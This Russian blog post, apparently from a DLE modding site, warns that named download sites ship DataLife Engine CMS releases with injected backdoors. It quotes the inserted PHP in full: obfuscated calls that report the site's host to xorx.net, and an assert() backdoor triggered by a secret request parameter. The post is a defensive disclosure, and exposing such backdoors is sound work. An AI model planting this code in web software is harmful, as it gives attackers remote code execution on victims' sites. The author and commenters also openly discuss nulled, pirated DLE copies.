Главная страница / DataLife Engine / Скрипты и другая информация / dlepavilion и newtemplates распространяют релизы DLE с левым кодом - остерегайтесь релизов с непроверенных источников

dlepavilion и newtemplates распространяют релизы DLE с левым кодом - остерегайтесь релизов с непроверенных источников

01 июнь 2020, Понедельник
1 008
10
dlepavilion и newtemplates распространяют релизы DLE с левым кодом - остерегайтесь релизов с непроверенных источников

Недавно решил все таки проверить работу yobobox в деле, и за одно сразу проверить ресурс, на который была ссылка для скачивания версии ДЛЕ 13.3, якобы там чистый оригинал. Но в итоге это не так, помимо левого файла engine\classes\min\lib\JSMinify.php так же внесены правки и в файлы движка. Решил полностью написать, как они правят ДЛЕ перед тем, как публикуют "грязный" релиз "оригинальной" DLE. Далее приведены файлы и код, который они внедряют на примере версии ДЛЕ 14.0.

  1. Добавляют файл engine\classes\min\lib\JSMinify.php с содержимым:

    Проверил ДЛЕ от 13 версии выше - данного файла никогда нет и не было в оригинальных релизах DLE.
    Так же этот файл прописан в доверенных в файле engine\classes\antivirus.class.php строкой:
    "./engine/classes/min/lib/JSMinify.php",

  2. в файле engine\inc\addnews.php добавлен код:
    $serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false)) 
    	{$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."14."."0_".$serv;};

    $fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));

  3. В файле engine\modules\calendar.php добевлено:
    $reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];

    $recaptcha_get_signup_id  = 'eb516e7d7a6462a6d531ec65dcf1d599';

     $setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get_signup_id) {@$setel(stripslashes($reg_base));}

  4. В engine\modules\feedback.php добавлено:
    $syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;

    $sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false)){$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTE0LjBf').$sert);}


Возможно в других версиях DLE они правили помимо данных файлов и ещё какие-то... Но проверки одной версии хватает вполне, чтобы понять, что данный сайт распространяет заразу в своих релизах, при этом в наглую пиздят:
dlepavilion и newtemplates распространяют релизы DLE с левым кодом - остерегайтесь релизов с непроверенных источников

и все верят на слово, а потом жалуются что их сайт проседает в выдаче яндекса из-за обмана мобильных пользователей.

В общем обращение ко всем: не доверяйте левым сайтам, на форумах нуллед и зерокул я всегда выкладываю чистые версии (правда только через две недели после релиза финала), но актуальные хэш-суммы файлов выкладываю по мере возможности, чтобы если на каком то из сайтов выкладывают новую версию - любой пользователь мог сравнить файлы по хэш-сумме и понять, оригинал ли там выложен или нет, и на основе этого делать вывод - использовать скачанный релиз или ждать 100% оригинала DLE.

UPD. Решил пройтись по топ-20 выдачи яндекса по запросу "скачать DLE" и составить список всех сайтов, распространяющих "грязные" чистые оригиналы DLE. Проверять буду по последней актуальной версии DLE 14.0. Попозже укажу полный список из топ-10 выдачи.

UPD 2. Список сайтов, распространяющие грязные DLE:
  1. newtemplates.ru
  2. dlepavilion.com
  3. dle-news.net
  4. teroni.ru

На prowebber.ru выложен только нулл ДЛЕ и грязи никакой не обнаружено внутри архива, а так же версия без обновлений ДЛЕ, т.е. не последний релиз версии 14.0. На остальных сайтах либо нет новых релизов ДЛЕ, либо платный доступ, а версии раньше 14.0 я не проверял, т.к. нет смысла проверять сайты, на которых выложена, к примеру, последняя версия 12.0.
Комментарии:
Прокомментировать
  1. Валерий15 сентября 2020 14:47
    Ачуметь, вся гадость была выше указанная в файлах, спасибо огромное и интересно какие команды выполняли эти коды...
    1. byrootАдминистраторы16 сентября 2020 14:32
      Не могу точно сказать, код не раскодировал. Но левый код это точно сразу не есть хорошо
  2. Гога6 августа 2020 15:59
    Спасибо, вовремя ваша статья попалась, подскажите, в скачанной с prowebber версии 14.0 nulled, надо вводить сгенерированный key?
    1. byrootАдминистраторы8 августа 2020 23:34
      Нет. На то она и нуллед версия, что активация не требуется
  3. Victor4 августа 2020 17:03
    newtemplates.ru не только с релизами такое делает, в шаблонах полно вирусов. Поэтому обходите данный ресурс стороной. Лично проверено с шаблонами, навтыкивают все, что им хочется.
    1. byrootАдминистраторы5 августа 2020 08:46
      В шаблоны они обычно только ссылки пихают, в скриптах не видел пока ещё у них ничего лишнего.
  4. root25 июня 2020 09:10
    Архив достаточно проверить по совпадению CRC32 или MD5, если они известны, чтобы понять лазили в него или нет.
    1. byrootАдминистраторы25 июня 2020 10:34
      Об этом так же написано выше, и на каких форумах я пишу хэш суммы оригинальных архивов после их релизов
  5. Валерий17 июня 2020 00:03
    Супер, спасибо за информацию!
  6. Uboom3 июня 2020 01:59
    Буду иметь в виду, спасибо.
Модули для создания киносайта и не только на базе DataLife Engine, и многое другое...
Просто блог Евгения Попова, он же - byroot © 2020